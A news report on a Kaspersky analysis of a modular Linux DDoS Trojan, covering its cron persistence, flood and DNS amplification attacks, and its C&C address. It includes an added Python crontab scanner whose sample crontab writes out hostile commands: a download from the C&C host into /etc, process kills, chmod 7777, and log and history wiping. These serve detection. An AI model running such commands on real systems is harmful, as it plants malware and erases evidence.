Kaspersky Lab Details ‘Versatile’ DDoS Trojan for Linux Systems

Researchers at Kaspersky Lab have published a detailed analysis of a “versatile” Linux DDoS Trojan available online.

In a blog post, Kaspersky Lab’s Mikhail Kuzin explained that the firm came across an article published in February on a Russian IT website titled ‘Studying the BillGates Linux Botnet’ that described a Trojan with DDoS functionality. 

“The capability that we found the most interesting was the Trojan’s ability to conduct DNS Amplification-type attacks,” wrote Kuzin, a junior malware analyst at Kaspersky Lab. “In addition, it followed from the article that the Trojan had a sophisticated modular structure, something we had not seen in the world of Linux malware before.”

The article provided a link to download all of the Trojan’s files. The archive contained a number of files that were all modules of the same Trojan: atddd; cupsdd; cupsddh; ksapdd; kysapdd; skysapdd; and xfsdxd. The files cupsdd and cupsddh are detected by Kaspersky Lab as Backdoor.Linux.Ganiw.a, while atddd and the remaining files are detected as Backdoor.Linux.Mayday.f. The archive with the files also contained a configuration file for cron – the Linux task scheduler. In this case, Kuzin stated, the utility is used to get a foothold on the system.

The Trojan uses cron to perform a number of tasks. Once a minute it terminates the processes of all applications that can interfere with its operation: .IptabLes, nfsd4, profild.key, nfsd, DDosl, lengchao32, b26, codelove and node24. In addition, roughly once every 90 minutes it terminates all of its own processes, and every two hours or so it deletes its components from the /etc folder and downloads them again to /etc from http://www.dgnfd564sdf.com:8080/[module_name] (module_name = name of the Trojan’s module, e.g., cupsdd). It also re-launches all of its modules every 90 minutes, purges system logs and bash command history, and executes chmod 7777 [module_name] every minute.
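A defender-side check for crontab entries that match the scheduled behaviour described above, added here as an example that is not from the Kaspersky analysis or the article; the module names, kill list and download host are the ones quoted above, and the sample crontab is constructed:

```python
import re
# Indicators from the cron behaviour described above (module names, kill list, host).
MODULE_NAMES = {"atddd", "cupsdd", "cupsddh", "ksapdd", "kysapdd", "skysapdd", "xfsdxd"}
KILL_TARGETS = {".IptabLes", "nfsd4", "profild.key", "nfsd", "DDosl",
                "lengchao32", "b26", "codelove", "node24"}
DOWNLOAD_HOST = "www.dgnfd564sdf.com:8080"

# Constructed sample crontab (user format: five time fields + command) modelled
# on the scheduled actions in the analysis; the last line is benign.
SAMPLE_CRONTAB = """\
* * * * * killall -9 .IptabLes nfsd4 profild.key nfsd DDosl lengchao32 b26 codelove node24
* * * * * chmod 7777 /etc/cupsdd
0 */2 * * * rm -f /etc/cupsdd; wget -O /etc/cupsdd http://www.dgnfd564sdf.com:8080/cupsdd
* * * * * cat /dev/null > /var/log/wtmp; cat /dev/null > /root/.bash_history
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
"""

def parse_cron_line(line):
    """Return (schedule, command) for a crontab entry, else None."""
    line = line.strip()
    if not line or line[0] == "#" or re.match(r"^[A-Za-z_]\w*=", line):
        return None                      # blank, comment or VAR=value line
    parts = line.split(None, 1) if line[0] == "@" else line.split(None, 5)
    if len(parts) == 6:                  # join the five time fields
        parts = [" ".join(parts[:5]), parts[5]]
    return tuple(parts) if len(parts) == 2 else None

def cron_findings(line):
    """List the indicators matched by one crontab line (empty = nothing found)."""
    parsed = parse_cron_line(line)
    if parsed is None:
        return []
    cmd, findings = parsed[1], []
    if DOWNLOAD_HOST in cmd:
        findings.append("fetches from the C&C host named in the analysis")
    if re.search(r"\bchmod\s+[0-7]?777\s", cmd):
        findings.append("sets mode 777/7777 on a file")
    for segment in re.split(r"\s*(?:;|&&|\|\|?)\s*", cmd):
        tokens = segment.split()
        if tokens and tokens[0] in ("killall", "pkill"):
            hits = {t for t in tokens[1:] if t[0] != "-"} & (KILL_TARGETS | MODULE_NAMES)
            if hits:
                findings.append("kills " + ", ".join(sorted(hits)))
    if re.search(r">\s*/var/log/|\.bash_history|\bhistory\s+-c\b", cmd):
        findings.append("purges logs or shell history")
    return findings

def scan_crontab(text):
    # Map each suspicious crontab line to its list of findings.
    return {e: f for e in text.splitlines() for f in [cron_findings(e)] if f}
```

Run it over `crontab -l` output or the files under /etc/cron.d (system crontabs carry an extra user field before the command, which this parser does not strip).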

“During subsequent analysis of the files, we did not find any code responsible for saving the config file for cron,” the researcher noted. “Most likely, the file was manually downloaded to the victim machine by a cybercriminal after gaining remote access to the system.”

The file atddd is a backdoor designed to conduct various types of DDoS attacks against the servers specified. The backdoor begins by calling the function daemon(1, 0), continuing to run in the background and redirecting standard input, output and errors to /dev/null, the researcher explained. Next it collects information about the system, and then decrypts strings defining the command and control server’s IP address and port number.

Eventually, the C&C passes along commands to attack using UDP floods, TCP floods, ICMP floods and DNS flood attacks.


Cupsdd (Backdoor.Linux.Ganiw.a) is also designed to carry out various types of DDoS attacks, but is more feature-rich and sophisticated, Kuzin blogged. Cupsddh, also detected as Backdoor.Linux.Ganiw.a, adds an attack type that uses DNS amplification.

“The last attack type on the list above is different in that packets are sent to vulnerable DNS servers, with the attack target specified as the sender’s IP address,” Kuzin blogged. “As a result, the cybercriminal sends a small packet with a DNS request and the DNS server responds to the attack target with a significantly larger packet. The list of vulnerable DNS servers is stored in the file libamplify.so, which is written to disk following the relevant command from the C&C.”

Recently, an updated version of the Trojan has appeared with new functions. The most significant changes were made to the Gates module, cupsdd. It now has three modes: the installation and update mode; the monitoring mode, in which it writes the PID of the current process to the file /tmp/moni.lock and starts threads to monitor the Bill module and the Gates module running in the mode for controlling the Bill module; and the final mode, for controlling the Bill module, which operates exactly as it did in the previous version of the Trojan.

“To summarize, in the new version of the Trojan its authors have added a little ‘robustness’ without making any significant functionality changes,” Kuzin blogged. “It is also worth noting that the hard-coded IP address of the C&C server has remained the same (116.10.189.246) in this version, but the port number has changed – it is now 36008 instead of 30000 in the previous version.”

More detail can be found here.
